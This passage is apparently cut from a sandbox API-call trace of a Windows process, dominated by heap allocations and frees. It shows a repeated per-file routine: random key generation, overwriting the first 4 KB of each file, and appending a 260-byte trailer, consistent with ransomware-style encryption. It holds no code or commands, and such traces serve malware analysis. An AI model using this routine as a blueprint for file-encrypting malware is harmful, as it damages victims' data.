hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.203] GetProcessHeap () returned 0x280000 [0076.204] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.204] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.204] WriteFile (in: hFile=0x7e4, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.204] WriteFile (in: hFile=0x7e4, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.204] GetProcessHeap () returned 0x280000 [0076.204] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.204] GetProcessHeap () returned 0x280000 [0076.204] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.204] GetProcessHeap () returned 0x280000 [0076.204] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.204] CloseHandle (hObject=0x7e4) returned 1 [0076.206] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 25 [0076.206] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.217] ReadFile (in: hFile=0x7e8, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.217] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.217] GetProcessHeap () returned 0x280000 [0076.217] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.217] GetProcessHeap () returned 0x280000 [0076.217] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.217] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.217] GetProcessHeap () returned 0x280000 [0076.217] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0076.217] ReadFile (in: hFile=0x7e8, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.267] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.267] WriteFile (in: hFile=0x7e8, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.267] GetProcessHeap () returned 0x280000 [0076.267] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.267] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.268] GetProcessHeap () returned 0x280000 [0076.268] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.268] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.269] GetProcessHeap () returned 0x280000 [0076.269] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.269] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.270] GetProcessHeap () returned 0x280000 [0076.270] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.271] GetProcessHeap () returned 0x280000 [0076.271] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.272] GetProcessHeap () returned 0x280000 [0076.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.272] GetProcessHeap () returned 0x280000 [0076.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.272] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.272] WriteFile (in: hFile=0x7e8, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.272] WriteFile (in: hFile=0x7e8, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.272] GetProcessHeap () returned 0x280000 [0076.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0076.272] GetProcessHeap () returned 0x280000 [0076.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.272] GetProcessHeap () returned 0x280000 [0076.272] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.272] CloseHandle (hObject=0x7e8) returned 1 [0076.277] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 26 [0076.277] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.277] ReadFile (in: hFile=0x7ec, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.277] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.277] GetProcessHeap () returned 0x280000 [0076.277] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.277] GetProcessHeap () returned 0x280000 [0076.277] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.277] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.277] GetProcessHeap () returned 0x280000 [0076.277] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0076.277] ReadFile (in: hFile=0x7ec, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.338] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.338] WriteFile (in: hFile=0x7ec, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.339] GetProcessHeap () returned 0x280000 [0076.339] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.339] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.340] GetProcessHeap () returned 0x280000 [0076.340] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.340] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.341] 